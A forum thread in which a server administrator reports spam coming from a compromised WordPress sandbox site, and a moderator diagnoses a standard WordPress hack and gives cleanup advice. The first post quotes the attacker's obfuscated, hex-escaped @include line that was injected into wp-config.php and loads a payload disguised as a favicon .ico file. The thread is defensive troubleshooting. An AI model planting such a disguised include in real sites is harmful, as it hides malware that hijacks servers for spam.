CENTOS server suddenly sending spam????

Discussion in 'ISPConfig 3 Priority Support' started by craig baker, Jan 3, 2018.

  1. craig baker

    craig baker Member HowtoForge Supporter

    I just noticed a complaint from my ISP (Verizon) that my server was generating complaints. well, I see 34,000 messages all being sent from a single domain - which is a sandbox. no website no nothing.
    I killed all the messages from or to the domain with postsuper - but it keeps generating new spams!!!
    Finally I removed the email record from ISPCONFIG so that domain is no longer recognized.
    But I was seeing a php-cgi invocation from the user (web45) associated with that website and I kept having to kill -9.
    finally I renamed the web folder of the site and that seems to have prevented it. something was hitting a url on a site hanging off this - and that hig was causing spam to be generated!
    the wp-config.php of the site had a suspicious line at the top:
    @include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";
    thats obviously /var/www/hocheapo.com/web/stats/favicon_omething.ico

    and maldet was flagging this and quarantining it. but how does it keep being created??? this iseems to be dropped in the stats folder which I renamed.

    removing the email record does NOT stop the spam by the way! only renaming the root away from /web has stopped it!

    Any idea what is doing this? or how to prevent it 'properly'?? anything else I need to do to protect against it?

  2. till

    till Super Moderator Staff Member ISPConfig Developer

    This looks like a normal WordPress hack.

    The email record is not related to the website that sends spam. An email record is for receiving email and for authenticating a mail user, but your system is sending email from a local website.

    This website has a wp-config.php so it seems to run Wordpress, right? In that case, Wordpress has been hacked. So this Wordpressinstallis either not up to date or it uses a vulnerable theme or plugin.

    Update Wordpress, update the used plugins and themes. If it happens again, then you'll have to investigate which part of the WP code is vulnerable and used to upload the malware file. You should also check the crontab of that web user to ensure that the malware did not place a cronjob there (crontab -e -u webXXX)

Share This Page